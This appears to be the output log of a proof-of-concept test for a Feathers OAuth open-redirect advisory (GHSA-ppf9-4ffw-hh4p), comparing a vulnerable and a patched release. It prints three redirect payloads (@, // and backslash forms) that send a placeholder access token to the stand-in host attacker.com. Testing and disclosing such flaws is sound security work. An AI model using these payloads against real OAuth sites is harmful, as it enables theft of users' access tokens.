[*] Testing GHSA-ppf9-4ffw-hh4p: Feathers OAuth Open Redirect ============================================================ TEST 1: URL Authority Injection with @ character ============================================================ Attack vector: ?redirect=@attacker.com Expected behavior: https://target.com@attacker.com#access_token=... Browser interpretation: username='target.com', host='attacker.com' --- VULNERABLE VERSION (v5.0.39) --- Generated URL: https://target.com@attacker.com#access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.stolen_token URL Analysis: - Protocol: https: - Username: target.com - Host: attacker.com - Fragment (contains token): #access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... [VULNERABLE] Token would be sent to attacker.com! --- PATCHED VERSION (v5.0.40) --- Request rejected: Invalid redirect path. [SAFE] Attack was blocked! ============================================================ TEST 2: Protocol-relative URL Injection with // ============================================================ Attack vector: ?redirect=//attacker.com --- VULNERABLE VERSION (v5.0.39) --- Generated URL: https://target.com//attacker.com#access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.stolen_token URL Analysis: - Host: target.com --- PATCHED VERSION (v5.0.40) --- Request rejected: Invalid redirect path. [SAFE] Attack was blocked! ============================================================ TEST 3: Backslash Character Attack ============================================================ Attack vector: ?redirect=\attacker.com Note: Some browsers treat backslash as forward slash --- VULNERABLE VERSION (v5.0.39) --- Generated URL: https://target.com\attacker.com#access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.stolen_token --- PATCHED VERSION (v5.0.40) --- Request rejected: Invalid redirect path. [SAFE] Attack was blocked! ============================================================ SUMMARY ============================================================ The vulnerability allows attackers to steal OAuth access tokens by injecting @, //, or \ characters in the redirect parameter. When the victim completes OAuth authentication, the access token is appended to a URL that appears to go to the legitimate site but actually redirects to the attacker's server. Example malicious URL: https://target.com@attacker.com#access_token=eyJhbGci... Browser interprets this as: - Username: target.com - Host: attacker.com - Fragment: #access_token=... (sent to attacker's server) The patched version (v5.0.40) validates the redirect parameter and rejects any path containing @, //, or \ characters. ======================================== VULNERABILITY CONFIRMED: GHSA-ppf9-4ffw-hh4p ========================================